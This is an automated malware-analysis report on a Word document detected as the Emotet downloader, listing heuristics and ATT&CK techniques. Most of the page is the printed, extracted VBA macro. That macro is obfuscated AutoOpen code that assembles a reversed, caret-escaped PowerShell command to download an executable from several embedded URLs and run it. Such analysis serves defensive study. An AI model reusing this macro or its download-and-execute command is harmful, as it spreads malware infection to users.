Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within the VBA macros. An AutoOpen macro is present and attempts to execute obfuscated commands. ClamAV identifies the file as Doc.Downloader.Emotet-6884041-0, strongly suggesting Emotet family involvement. The VBA script likely downloads and executes a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6884041-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884041-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4914 bytes |
SHA-256: 7df4352b59a3344510a2017edc6af968300755ef045a6a40dc76567a2651cd63
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vvrPUYm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If fQVuAo <= 1 Then
TnzGaz = "GTXi"
End If
If FhuwfK <= 11 Then
ELKjV = "ji"
End If
If XwmJht >= 15 Then
KDDRZk = "RQcNdd"
End If
If WfGzL = cZhswQ Then
rXzsnQ = "vCnfFd"
End If
MniJQWh (KeyString(AoPkf + WYpqKEEG + 8 + 8 + 51 + FPjOdBzr + PFlmQAXd) + UBNIJmT + FbOro + KeyString(dsXnQtYo + nCaJhb + 9 + 9 + 59 + XDBaE + mqCRANw) + HbbcVFTXnn + YPibOusk + FwucrdH + mnsPqtbR + aDrpGm + Ysvbct)
If QwwiRH <= jsXTr Then
rhZFCG = "HbjEUiUuUtSJ"
End If
If ofDsFS Xor KziSLv Then
KWVamX = "pStJnnfLwFK"
End If
End Sub
Attribute VB_Name = "DCVNwnLwizlJi"
Function HbbcVFTXnn()
If JaiWY > HUpILC Then
iqLftT = "tSMFSrmGi"
End If
If SPMlw >= tDMIs Then
uDWYrB = "zpC"
End If
If zAzFp < VuXoQb Then
QNfCP = "SZsVfjW"
End If
If qOYEh <> BpXms Then
hwuBmq = "qAd"
End If
MjaqPRPw = "d /V^:^ON/C" + """" + "^s^e^t ^x^I=^ " + "^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^}^}^{^hc^" + "t^ac^}^;^k^a^er^"
If wvsPN > 4 Then
WJONwV = "Fc"
End If
If TvEUSj Eqv 2 Then
jwuil = "VDHDRIKjquH"
End If
CTUiQpR = "b^;^HV^j^$^ ^" + "m^e^t^I^-^ek^ovn" + "^I;)^HV^j$^ ^,N^w^i" + "^$(^e^li^F^" + "d^a^o^lnw^o^" + "D^.^Z^Q^t^$^{^yr"
ZlSRqtVmOt = "^t^{)n^W^j^$" + "^ n^i^ N^w^i^$(hc^a" + "^ero^f^;^'^e"
HbbcVFTXnn = MjaqPRPw + CTUiQpR + ZlSRqtVmOt
If hUohj Xor OiHpKi Then
ChdGs = "tOdqISCofwlNz"
End If
If MPwUE Xor 9 Then
wLIrLc = "z"
End If
End Function
Function YPibOusk()
MTlwsXz = "^x^e^.^'^+NN^j^$" + "^+^'^\^'^+c^i^lb^" + "u^p^:vn^e^$=HVj"
If ivijW Eqv 12 Then
LXOiZM = "W"
End If
If uQbjDD Eqv VQPEzt Then
Tdmor = "TmqmNqkak"
End If
If IRDVb < TNOYO Then
FJhWIB = "rEi"
End If
mmzHZYXtJ = "^$^;'^7^2^4^'" + "^ ^=^ NN^j^$" + "^;)^'^@^'(^t^i^l^p^S" + "^.^'x^O^Zx^M^L" + "C^U^JR/^s^d^a^o^" + "l^p^u/^tn^e^"
If YHZpWM And 19 Then
HlvwS = "UJf"
End If
If dRTGWk And zMcPo Then
EHtApO = "Zz"
End If
If hZzoCw <> 3 Then
aMMQG = "NiHLvaO"
End If
iEqDBvZUKb = "tn^oc^-^p^w/^d^i" + "^.c^a^.^a^h" + "^s^k^i^dn^u^.^" + "a^s^a^kr^e^p//^:^p"
If LVTTQO Xor fKOiB Then
KBCdj = "LTtZhE"
End If
If CzPMfV Xor tcqiP Then
TFCGn = "QPV"
End If
If qSuVJ <> 16 Then
jABDD = "vbf"
End If
If UKEwKw Eqv 7 Then
TklNUS = "pZXArsw"
End If
If JboXR > lPraNh Then
BzjFRY = "zTP"
End If
zFucP = "^t^t^h^@^7^" + "9^H^2^P^x^J^Q" + "^H^s/^m^oc^.^o^m^" + "h^sa^m^l^a^" + "p^s^a^l^l^e^"
YPibOusk = MTlwsXz + mmzHZYXtJ + iEqDBvZUKb + zFucP
If mqjNGT Eqv ajPmNq Then
lABMVq = "YpNGr"
End If
If iFXHF = CKzzlO Then
MwJair = "hChhuwwzKpsIk"
End If
End Function
Function FwucrdH()
If orvPE Or NAWGO Then
zSimI = "PaSJkb"
End If
If zaXFW <> maTNhP Then
SwSUKW = "iJT"
End If
If AoZEkZ And 19 Then
HqGFwz = "oH"
End If
If Eciub < 18 Then
TrRla = "czSHkF"
End If
If QqpGfG > UwImd Then
kcdZw = "Fsi"
End If
BOGUphIp = "t^o^h//^:p^t^t^h^@" + "Ru^oN^z^a^" + "6^Jc/^k^u.^oc^." + "^d^t^l^s^s^a^am"
If KKoEau Eqv JLCbGl Then
MFqjQk = "SfnJijj"
End If
ETLAjB = "-^w//^:^p^t" + "^t^h^@^0^G^b^" + "4^Q^b^Z^0^g/^b^u^p^" + ".e^l^i^a//"
If iAvvOA < AsiHz Then
stGhG = "InaXIKduq"
End If
If swmmT > kzJDP Then
FPATCl = "wawJ"
End If
QtHItjbw = "^:^p^t^t^h^@" + "^f^f^P^A^X^o^f/^m^o" + "c^.^s^s^a^l^g^l^j/" + "/^:^p^t^t^h^'=n^Wj^$" + "^;^tn^e^i^lC"
GGhZXKlI = "^b^e^W^.^t^eN^ ^tc^" + "e^j^bo^-^wen^=^" + "Z^Q^t^$^ ^" + "l^l^e^h^sr^e^wo^p&&^"
FwucrdH = BOGUphIp + ETLAjB + QtHItjbw + GGhZXKlI
If iMEiR Or 17 Then
KcwJNq = "qjB"
End If
If pHLFq >= iCRLww Then
DvZmio = "aPiANuqmWvB"
End If
If oRuoLp > vDKiM Then
tUusUr = "pdMDEcmlkFOoJ"
End If
End Function
Function mnsPqtbR()
If pDANjt Eqv cKrwuw Then
WKuEVk = "RJMUm"
End If
If TiIcW <> 12 Then
zOLzi = "T"
End If
zkMHGw
... (truncated)